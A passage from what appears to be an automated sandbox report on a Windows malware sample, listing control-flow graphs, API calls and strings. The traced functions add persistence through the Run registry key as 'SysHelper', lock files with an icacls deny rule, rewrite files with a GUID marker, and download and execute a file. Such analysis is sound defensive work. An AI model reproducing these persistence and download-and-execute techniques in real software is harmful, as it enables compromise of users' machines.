                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                                                        • Opcode ID: 7a5285165aaf4b1587d2ae7be8df9f8986128b1d7e0713c34aa4609b1026d5da
                                                                                                                                                                        • Instruction ID: bba2004e6dd673320710f17899889a62ef68a838ff8181a5209c29749342ec4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5285165aaf4b1587d2ae7be8df9f8986128b1d7e0713c34aa4609b1026d5da
                                                                                                                                                                        • Instruction Fuzzy Hash: 91B15970D142099BDF20EFA4C885BEEB7F5FF15318F1040B9E409AB251EB759A45CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA1CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 985 ba1cd0-ba1d1a call bbf7c0 RegOpenKeyExW 988 ba1d20-ba1d8d call bbb420 RegQueryValueExW RegCloseKey 985->988 989 ba2207-ba2216 985->989 992 ba1d8f-ba1d91 988->992 993 ba1d93-ba1d9c 988->993 994 ba1daf-ba1dcb call ba5c10 992->994 995 ba1da0-ba1da9 993->995 999 ba1e7c-ba1e87 994->999 1000 ba1dd1-ba1df8 lstrlenA call ba3520 994->1000 995->995 996 ba1dab-ba1dad 995->996 996->994 1001 ba1e89-ba1e91 call bb2587 999->1001 1002 ba1e94-ba1f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 999->1002 1006 ba1dfa-ba1dfe 1000->1006 1007 ba1e28-ba1e2c 1000->1007 1001->1002 1014 ba1f3a-ba1f3f 1002->1014 1015 ba1f36-ba1f38 1002->1015 1010 ba1e0b-ba1e23 call ba45a0 1006->1010 1011 ba1e00-ba1e08 call bb2587 1006->1011 1012 ba1e2e-ba1e39 call bb2587 1007->1012 1013 ba1e3c-ba1e50 PathFileExistsW 1007->1013 1010->1007 1011->1010 1012->1013 1013->999 1021 ba1e52-ba1e57 1013->1021 1020 ba1f40-ba1f49 1014->1020 1019 ba1f4f-ba1f96 call ba5c10 RpcStringFreeW PathAppendW CreateDirectoryW 1015->1019 1033 ba1f98-ba1fa0 1019->1033 1034 ba1fce-ba1fe9 1019->1034 1020->1020 1024 ba1f4b-ba1f4d 1020->1024 1025 ba1e6a-ba1e6e 1021->1025 1026 ba1e59-ba1e5e 1021->1026 1024->1019 1025->989 1028 ba1e74-ba1e77 1025->1028 1026->1025 1029 ba1e60-ba1e65 call ba4690 1026->1029 1031 ba21ff-ba2204 call bb2587 1028->1031 1029->1025 1031->989 1036 ba1fa2-ba1fa4 1033->1036 1037 ba1fa6-ba1faf 1033->1037 1038 ba1feb-ba1fed 1034->1038 1039 ba1fef-ba1ff8 1034->1039 1041 ba1fbf-ba1fc9 call ba5c10 1036->1041 1042 ba1fb0-ba1fb9 1037->1042 1043 ba200f-ba2076 call ba5c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 1038->1043 1044 ba2000-ba2009 1039->1044 1041->1034 1042->1042 1045 ba1fbb-ba1fbd 1042->1045 1050 ba207c-ba2107 call bbb420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 1043->1050 1051 ba21d1-ba21d5 1043->1051 1044->1044 1047 ba200b-ba200d 1044->1047 1045->1041 1047->1043 1058 ba2109-ba2110 call ba3260 1050->1058 1059 ba2115-ba21a8 call bbb420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 1050->1059 1052 ba21e2-ba21fa 1051->1052 1053 ba21d7-ba21df call bb2587 1051->1053 1052->989 1057 ba21fc 1052->1057 1053->1052 1057->1031 1058->1059 1064 ba21aa-ba21b0 GetLastError 1059->1064 1065 ba21b2-ba21b8 1059->1065 1064->1051 1066 ba21c0-ba21cf WaitForSingleObject 1065->1066 1066->1051 1066->1066
                                                                                                                                                                        APIs
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D12
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA1D3B
                                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00BA1D63
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00C5AC68,000000FF), ref: 00BA1D6C
                                                                                                                                                                        • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00BA1DD6
                                                                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00BA1E48
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00BA1E99
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00BA1EA5
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 00BA1EB4
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00BA1EBF
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00000000), ref: 00BA1ECE
                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 00BA1EDB
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00BA1EFC
                                                                                                                                                                        • UuidToStringW.RPCRT4(?,?), ref: 00BA1F14
                                                                                                                                                                        • RpcStringFreeW.RPCRT4(00000000), ref: 00BA1F64
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?), ref: 00BA1F83
                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BA1F8E
                                                                                                                                                                        • PathAppendW.SHLWAPI(?,?,?,?), ref: 00BA202D
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00BA2036
                                                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 00BA204C
                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00BA206E
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA2090
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,00C902FC), ref: 00BA20AA
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00BA20C0
                                                                                                                                                                        • lstrcatW.KERNEL32(?," --AutoStart), ref: 00BA20CE
                                                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 00BA20D7
                                                                                                                                                                        • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 00BA20F3
                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00BA20FC
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA2120
                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00BA2146
                                                                                                                                                                        • lstrcpyW.KERNEL32(?,icacls "), ref: 00BA2158
                                                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 00BA216D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                                                                                                                                                        • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                                                                                                                                                        • API String ID: 2589766509-1182136429
                                                                                                                                                                        • Opcode ID: 6d1d11e8eec05ad37b82ed84a73950069a2f931c2e396b3661a7d0c9d6ac13be
                                                                                                                                                                        • Instruction ID: a462904f1f806b46da07b537519e7d62a0c5dc1e09f74b1344c065141fd00c9e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d1d11e8eec05ad37b82ed84a73950069a2f931c2e396b3661a7d0c9d6ac13be
                                                                                                                                                                        • Instruction Fuzzy Hash: 62E15B75D0431AAFDF24DBA4CD89BEEB7B8FF04305F1044AAE505B6190EB74AA85CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA11C0 Relevance: 65.3, APIs: 36, Strings: 1, Instructions: 551filestringmemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1067 ba11c0-ba121d CreateFileW 1068 ba18eb-ba18fb 1067->1068 1069 ba1223-ba1232 GetFileSizeEx 1067->1069 1070 ba12a3-ba12be VirtualAlloc 1069->1070 1071 ba1234 1069->1071 1072 ba131a-ba1331 CloseHandle 1070->1072 1073 ba12c0-ba12d5 call bbb420 1070->1073 1074 ba123c-ba1281 CloseHandle call ba3100 call ba59d0 MoveFileW 1071->1074 1075 ba1236-ba123a 1071->1075 1081 ba12db-ba12de 1073->1081 1082 ba13b1 1073->1082 1074->1068 1087 ba1287-ba12a2 call bb2587 1074->1087 1075->1070 1075->1074 1084 ba12e9-ba130a SetFilePointerEx 1081->1084 1085 ba12e0-ba12e3 1081->1085 1086 ba13b7-ba13ef SetFilePointer 1082->1086 1088 ba130c-ba1314 VirtualFree 1084->1088 1089 ba1332-ba134d ReadFile 1084->1089 1085->1082 1085->1084 1090 ba15bf 1086->1090 1091 ba13f5-ba140d ReadFile 1086->1091 1088->1072 1089->1088 1094 ba134f-ba1354 1089->1094 1092 ba15c5-ba15d9 SetFilePointerEx 1090->1092 1095 ba140f-ba143f VirtualFree CloseHandle call ba2d50 1091->1095 1096 ba1440-ba1445 1091->1096 1092->1095 1099 ba15df-ba15eb 1092->1099 1094->1088 1097 ba1356-ba1359 1094->1097 1096->1090 1100 ba144b-ba146b 1096->1100 1097->1086 1102 ba135b-ba1377 call ba2c40 call ba7060 1097->1102 1104 ba160e-ba1643 call ba30b0 call ba2840 1099->1104 1105 ba15ed-ba15fc WriteFile 1099->1105 1106 ba1718-ba17d9 lstrlenA call bb0be4 lstrlenA call bbd8d0 lstrlenA call b9eaa0 call bb2110 call b9bbd0 call b9bd50 call ba2f70 call b9c070 1100->1106 1107 ba1471-ba15a8 lstrlenA call bb0be4 lstrlenA call bbd8d0 lstrlenA call b9eaa0 call bb2110 call b9c5c0 call ba2d10 call ba2d50 call b9bbd0 call b9bd50 call ba3ff0 call ba2f70 call b9c070 SetFilePointer 1100->1107 1128 ba1379-ba13a6 VirtualFree CloseHandle call ba2d50 1102->1128 1129 ba13a7-ba13af call ba2d50 1102->1129 1131 ba1647-ba165a WriteFile call ba2d50 1104->1131 1132 ba1645 1104->1132 1105->1095 1109 ba1602-ba160b call bb2110 1105->1109 1182 ba17e1-ba182e call ba2d50 call ba2c40 call ba2bf0 call b9cba0 1106->1182 1107->1182 1196 ba15ae-ba15ba call ba2d50 * 2 1107->1196 1109->1104 1129->1086 1131->1095 1143 ba1660-ba1680 lstrlenA WriteFile 1131->1143 1132->1131 1143->1095 1146 ba1686-ba16de CloseHandle call ba3100 call ba59d0 MoveFileW 1143->1146 1162 ba18a7-ba18d3 call ba3210 call ba2d50 1146->1162 1163 ba16e4-ba1717 VirtualFree call ba3210 call ba2d50 1146->1163 1184 ba18e3-ba18e6 1162->1184 1185 ba18d5-ba18dd VirtualFree 1162->1185 1203 ba186e-ba18a6 VirtualFree CloseHandle call ba2d50 * 2 1182->1203 1204 ba1830-ba1832 1182->1204 1184->1068 1188 ba18e8-ba18e9 CloseHandle 1184->1188 1185->1184 1188->1068 1196->1090 1204->1203 1205 ba1834-ba185b WriteFile 1204->1205 1205->1203 1208 ba185d-ba1869 call ba2d50 1205->1208 1208->1092
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00BA120F
                                                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00BA1228
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA123D
                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00BA1277
                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00025815,00001000,00000004,?,00000000,?), ref: 00BA12B1
                                                                                                                                                                        • _memset.LIBCMT ref: 00BA12C8
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00BA1301
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00BA1314
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA131B
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000026,?,00000000,?,00000000,?), ref: 00BA1349
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00000000,?), ref: 00BA1381
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA1388
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 00BA13E6
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00025805,?,00000000,?,00000000,?), ref: 00BA1409
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?), ref: 00BA1417
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00BA141E
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,?), ref: 00BA1471
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,00000000,?), ref: 00BA1491
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,00000000,?), ref: 00BA14CF
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000005,00000000,00000000,00000005,00000000,-000000FB,-000000FB,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 00BA159D
                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00BA15D0
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?), ref: 00BA15F8
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00BA1649
                                                                                                                                                                        • lstrlenA.KERNEL32({36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA166B
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5},00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA1678
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00BA168D
                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00BA16D6
                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00BA16EB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseHandleVirtual$FreePointerlstrlen$Write$MoveRead$AllocCreateSize_memset
                                                                                                                                                                        • String ID: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                        • API String ID: 254274740-1186676987
                                                                                                                                                                        • Opcode ID: 33fa40aba69a8bb190c8e80808bea4005c2dcc299c8221a300b7d1bb98cef3e9
                                                                                                                                                                        • Instruction ID: 9d8e11079d4c17064d9213862ed4009ccb8dca204e52642fc03e9da49ab6df0d
                                                                                                                                                                        • Opcode Fuzzy Hash: 33fa40aba69a8bb190c8e80808bea4005c2dcc299c8221a300b7d1bb98cef3e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 96228970D04208AFEF14EBA8DC85BEEBBB8EF06305F1041A9F515B7292DB745A44CB65
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BADBD0 Relevance: 49.6, APIs: 23, Strings: 5, Instructions: 565networkfilelibraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1412 badbd0-badcea call bbf7c0 call ba3ff0 call ba56d0 call ba3ff0 call b9ecb0 1423 bae459-bae45f 1412->1423 1424 badcf0-badd82 LoadLibraryW GetProcAddress call ba3c40 UuidCreate UuidToStringA 1412->1424 1426 bae498-bae4a0 1423->1426 1427 bae461-bae465 1423->1427 1441 badd88-badd8d 1424->1441 1442 badd84-badd86 1424->1442 1428 bae4a2-bae4ae call bb2587 1426->1428 1429 bae4b1-bae4c7 1426->1429 1431 bae48f-bae495 call bb2587 1427->1431 1432 bae467-bae46b 1427->1432 1428->1429 1431->1426 1435 bae46d-bae474 call bb2587 1432->1435 1436 bae477-bae48d 1432->1436 1435->1436 1436->1431 1436->1432 1445 badd90-badd95 1441->1445 1444 badd99-bade83 call ba56d0 RpcStringFreeA PathAppendA CreateDirectoryA call ba84e0 call ba3ff0 call ba2900 call ba3580 1442->1444 1457 bade94-bade99 1444->1457 1458 bade85-bade91 call bb2587 1444->1458 1445->1445 1447 badd97 1445->1447 1447->1444 1460 bae3da-bae3e2 1457->1460 1461 bade9f-badea3 1457->1461 1458->1457 1464 bae3f3-bae419 1460->1464 1465 bae3e4-bae3f0 call bb2587 1460->1465 1462 badea7-badebc call ba4300 1461->1462 1475 badebe-badec2 1462->1475 1476 baded0-badf5a call bbb420 InternetOpenA call ba3ff0 call ba2900 call bb1c02 1462->1476 1467 bae42a-bae44a 1464->1467 1468 bae41b-bae427 call bb2587 1464->1468 1465->1464 1472 bae44c-bae452 call bb2587 1467->1472 1473 bae455 1467->1473 1468->1467 1472->1473 1473->1423 1479 badec8 1475->1479 1480 badec4-badec6 1475->1480 1491 badf60-badf9c call ba4690 call b9dd40 1476->1491 1492 bae031-bae075 call ba4690 call ba2840 1476->1492 1483 badeca-badece 1479->1483 1480->1483 1483->1476 1501 badf9e-badfa3 1491->1501 1502 bae014-bae01c 1491->1502 1503 bae079-bae08b InternetOpenUrlA 1492->1503 1504 bae077 1492->1504 1507 badfb1-badfcc 1501->1507 1508 badfa5-badfae call bb2587 1501->1508 1505 bae01e-bae02a call bb2587 1502->1505 1506 bae02d 1502->1506 1509 bae09c-bae0bc 1503->1509 1510 bae08d-bae099 call bb2587 1503->1510 1504->1503 1505->1506 1506->1492 1515 badfce-badfd2 1507->1515 1516 badfe7-badfed 1507->1516 1508->1507 1511 bae0be-bae0cb 1509->1511 1512 bae0e2-bae11b HttpQueryInfoW 1509->1512 1510->1509 1518 bae3c2-bae3cd 1511->1518 1519 bae0d1-bae0dd call bb2587 1511->1519 1512->1511 1521 bae11d-bae15f call ba3ff0 call bae5b0 1512->1521 1523 badff3-bae011 1515->1523 1524 badfd4-badfe5 call bb05a0 1515->1524 1516->1523 1518->1462 1528 bae3d3 1518->1528 1519->1518 1535 bae161-bae16f 1521->1535 1536 bae174-bae19f call bae5b0 call ba3010 1521->1536 1523->1502 1524->1523 1528->1460 1535->1536 1541 bae1d3-bae1db 1536->1541 1542 bae1a1-bae1a6 1536->1542 1545 bae1ec-bae248 lstrcpyA PathAppendA 1541->1545 1546 bae1dd-bae1e9 call bb2587 1541->1546 1543 bae1a8-bae1b1 call bb2587 1542->1543 1544 bae1b4-bae1ce call ba3d40 1542->1544 1543->1544 1544->1541 1550 bae24a-bae24c 1545->1550 1551 bae24e-bae250 1545->1551 1546->1545 1554 bae25c-bae293 call ba56d0 CreateFileA 1550->1554 1555 bae253-bae258 1551->1555 1559 bae299-bae2a9 SetFilePointer 1554->1559 1560 bae353-bae358 1554->1560 1555->1555 1557 bae25a 1555->1557 1557->1554 1559->1560 1561 bae2af 1559->1561 1562 bae35a-bae363 call bb2587 1560->1562 1563 bae366-bae380 1560->1563 1566 bae2b1-bae2cf InternetReadFile 1561->1566 1562->1563 1564 bae38e-bae3b0 1563->1564 1565 bae382-bae38b call bb2587 1563->1565 1572 bae3be 1564->1572 1573 bae3b2-bae3bb call bb2587 1564->1573 1565->1564 1570 bae2d1-bae2da 1566->1570 1571 bae314 1566->1571 1570->1571 1575 bae2dc-bae303 WriteFile 1570->1575 1577 bae316-bae32e CloseHandle InternetCloseHandle * 2 1571->1577 1572->1518 1573->1572 1575->1577 1578 bae305-bae310 1575->1578 1577->1560 1580 bae330-bae332 1577->1580 1578->1566 1581 bae312 1578->1581 1580->1560 1582 bae334-bae34d ShellExecuteA 1580->1582 1581->1577 1582->1560
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00B9ECB0: _strtok.LIBCMT ref: 00B9ED66
                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.dll), ref: 00BADCF5
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 00BADD01
                                                                                                                                                                          • Part of subcall function 00BA3C40: _memset.LIBCMT ref: 00BA3C83
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00BADD3C
                                                                                                                                                                        • UuidToStringA.RPCRT4(?,?), ref: 00BADD57
                                                                                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00BADDB4
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,00000000), ref: 00BADDD3
                                                                                                                                                                        • CreateDirectoryA.KERNEL32(?,00000000), ref: 00BADDDC
                                                                                                                                                                        • _memset.LIBCMT ref: 00BADEE7
                                                                                                                                                                        • InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00BADEFC
                                                                                                                                                                          • Part of subcall function 00BA2900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00BA2966
                                                                                                                                                                        • _wcsstr.LIBCMT ref: 00BADF50
                                                                                                                                                                        • InternetOpenUrlA.WININET(00000000,00000000), ref: 00BAE07B
                                                                                                                                                                          • Part of subcall function 00B9DD40: _wcsstr.LIBCMT ref: 00B9DD8D
                                                                                                                                                                          • Part of subcall function 00B9DD40: _wcsstr.LIBCMT ref: 00B9DDB6
                                                                                                                                                                          • Part of subcall function 00B9DD40: _memset.LIBCMT ref: 00B9DDE4
                                                                                                                                                                          • Part of subcall function 00B9DD40: lstrlenW.KERNEL32(?), ref: 00B9DE0A
                                                                                                                                                                          • Part of subcall function 00B9DD40: gethostbyname.WS2_32(00C90134), ref: 00B9DEA7
                                                                                                                                                                        • _memmove.LIBCMT ref: 00BADFDD
                                                                                                                                                                        • HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 00BAE10D
                                                                                                                                                                        • lstrcpyA.KERNEL32(?,?), ref: 00BAE229
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,?), ref: 00BAE23F
                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00BAE288
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BAE2A0
                                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00002800,?), ref: 00BAE2C7
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00BAE2FB
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00BAE317
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00BAE324
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00BAE32A
                                                                                                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 00BAE34D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
